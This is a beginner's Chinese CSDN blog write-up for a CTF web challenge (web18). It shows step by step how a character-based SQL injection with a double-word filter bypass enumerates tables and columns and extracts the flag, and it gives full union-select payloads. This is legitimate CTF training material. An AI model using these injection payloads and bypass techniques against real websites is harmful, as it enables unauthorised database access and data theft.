CTF论剑场web题目(持续更新)--WEB18

最新推荐文章于 2022-03-08 16:18:18 发布
最新推荐文章于 2022-03-08 16:18:18 发布
阅读量491 收藏
点赞数 1
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiuyongpinyin/article/details/107463709
版权

web18

首先打开页面随便点点,发现list中像是有注入点:
在这里插入图片描述
所以我们进行尝试,发现是字符型注入:
在这里插入图片描述
我们尝试一下就基本的有没有被过滤,先尝试 or 1=1,发现没有回显,尝试了大写然后也不行,尝试双写发现成功了:
在这里插入图片描述
所以接下来就是使用order by 查看列:
在这里插入图片描述

使用联合查询,查询数据库:
在这里插入图片描述
发现数据库是web18,接下来查询表:
在这里插入图片描述
payload:

?id=11' ununionion seselectlect 1,(seselectlect group_concat(table_name) from infoorrmation_schema.tables where table_schema='web18'),3  --+

发现有ctf和flag连个表,我们查看flag这个表里面的列:
在这里插入图片描述
payload:

?id=11' ununionion seselectlect 1,(seselectlect group_concat(column_name) from infoorrmation_schema.columns where table_name='flag'),3  --+

查出flag表里面有id和flag这两列,接下来我们查字段,就可以得到flag了,这里就直接给出payload了:

?id=11' ununionion seselectlect 1,(seselectlect flag from flag),3  --+

注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正。

拼音怪兽
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Ctfshow web 入门1~20题(萌新向)
weixin_52805837的博客
12-29 3868
Ctfshow web 入门1~12题 web1: 打开网址显示如下: F12直接查看源码即可得到flag web2: ctrl+u打开源码即可得到flag web3: 根据提示“没思路抓个包看看,可能有意外收获” 抓包之后,如上得到了flag web4: ...
记一次CTF题目 CTF_论剑web26)
BigRingKing的博客
05-25 253
CTF题目 web_26
CTF_论剑(bugku新平台)部分题目write up
城南以南花亦开
03-31 2455
CTF_论剑(bugku新平台) 部分题目write up(1)头像签到0和1的故事最简单的pwnweb26web1这个人真的很高web9Snake进制转换流量分析ezsypdf 头像 使用WinHex打开图片,尝试搜索关键字“flag”,发现flag; 按照题目要求,使用所找到flag的md5 32位加密值进行验证,发现flag错误; 换个方式,将所找到flag先进行base64解码,...
刷题之旅第2站,论剑web16、web17、web18web19、web20
cc菜的一批
01-15 552
web16 此题不会,有待解决。会做的大佬,希望能在评论区指点一下。 题目地址 web17 流量分析,wireshark打开,TCP流追踪得到flag web18 试探过程如下 id=1’ 回显空白,可能是单引号闭合,字符型注入 id=1’ --+ 回显正常,字符型注入 id=1’ and 1=1 --+ 回显空白,可能过滤了and 或者空格 id=1’anandd 1=1 --+ 回显...
CTF_论剑
timesleep的博客
03-08 136
1.头像 直接拉到winhax中查找文本flag就找到了,然后base64解码,再用MD5加密32位 2.签到 直接就给出flag 3.0和1的故事 打开压缩包最后看到了一个flag{}.txt的文件 打开发现后面有空格拉到windex中 然后转成16进制提交 4.这个人真的很高 图片另存为 打开查看我们修改它的高度查看一下详细 然后我们拖进winhex修改一下高度 640的十六进制为280 499的十六进制为1f3 然后我们修改为300 然后保查看 我们看到了加密过的前半部分在找后面的
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
ctfshow-VIP题目-Web-详细解题思路
最新发布
01-27
ctfshow-VIP题目-Web-详细解题思路
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
CTF-网络挑战使用PHP在Web中进行CTF挑战链接: :
CTFWeb各种题目的解题姿势PPT模板
02-21
CTFWeb各种题目的解题姿势PPT模板
CTF Web各种题目的解题姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
CTF_论剑 Web WriteUp(持续更新
qq_41995976的博客
05-19 6297
文章目录web1web9流量分析web2web5web6web11web13日志审计web20 web1 利用的是变量覆盖漏洞 http://www.mamicode.com/info-detail-2314166.html payload:http://123.206.31.85:10001/?a=&c=aaaaa web9 题干: 要求你PUT一串信息"bugku" 才能获得flag...
CTF论剑(web) write up 未完待续
qq_45106794的博客
11-09 436
CTF论剑(web) write up web26 直接给你一串代码 <?php $num=$_GET['num']; $str=$_GET['str']; show_source(__FILE__); if (isset($num)&&isset($str)) { if (preg_match('/\d+/sD',$str)) { echo "v...
CTF_论剑 webweb2
silence1_的博客
05-31 1518
CTF_论剑 webweb2 题目: 进入题目,一看就是要写脚本的那种题2333 python脚本如下: import requests url="http://123.206.31.85:10002/" res=requests.get(url) cookies=res.cookies["PHPSESSID"] #获得session t...
CTF_论剑-web26
Ch_an_ger的博客
09-21 813
首先打开题目链接是一个代码审计, 咱把代码拉出来加些注释 这样看起来就很明了了,我们只需要在num传入数字str传入字符串就能得到flag
CTF论剑Web1
nzw1134864657的博客
11-18 288
题目http://123.206.31.85:3032/L3yx.php
CTF_论剑_web1
Ch_an_ger的博客
09-22 577
这题还是看代码审计, 关于payload的说发有很多说法的有的说这个extract()函数能对已有变量进行值覆盖,但是我自己的解释还是觉得突破点在file_get_contents()函数,这个函数本是用来读取文件的,但是现在读取的是一个字符串,所以这个函数返回到$c的值就为空,所以此时应该传入a参数的值为空来拿到flag ...
CTF论剑 Web10 WriteUp
vegetable_haker的博客
11-13 515
Ctrl+U查看页面源代码,发现一串编码,从尾部的三个等号猜测是base32编码 2. 用base32在线解码器解码,结果如下:3. 猜测以上结果是用户名和密码,尝试登录,同时用burpsuit抓包,登录成功,抓包结果如下,有一长串被“.”分割为三部分的字符,这是网站用JWT的方法进行认证 4.从kk’s diary可以发现,Vim崩溃并且网站有秘密 Vim崩溃时文件会备份缓存,并且以*.s...
ctf论剑_misc_easypdf writeup
nonono123456的博客
09-24 1520
下载回来一个pdf文件 直接用pdf编辑器打开,发现图片下还有一个文字层,挪走图片就看到了flag,注意要改成小写。
ctf_论剑 easydoc misc
nonono123456的博客
09-26 588
ctf_论剑 easydoc misc 打开压缩包,看到一个doc存在密码 直接爆破word密码 打开word发现下面有一行小字,倒序的核心价值观编码 倒序之后进行解码
ctfweb题目docker镜像
11-26
ctfweb题目"docker镜像"是指一个挑战题目,要求我们对一个Docker镜像进行分析和攻击。Docker是一种容器化技术,可以将应用、环境和关联的配置打包成一个独立的镜像。这个镜像可以在不同的环境中进行移植和运行。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值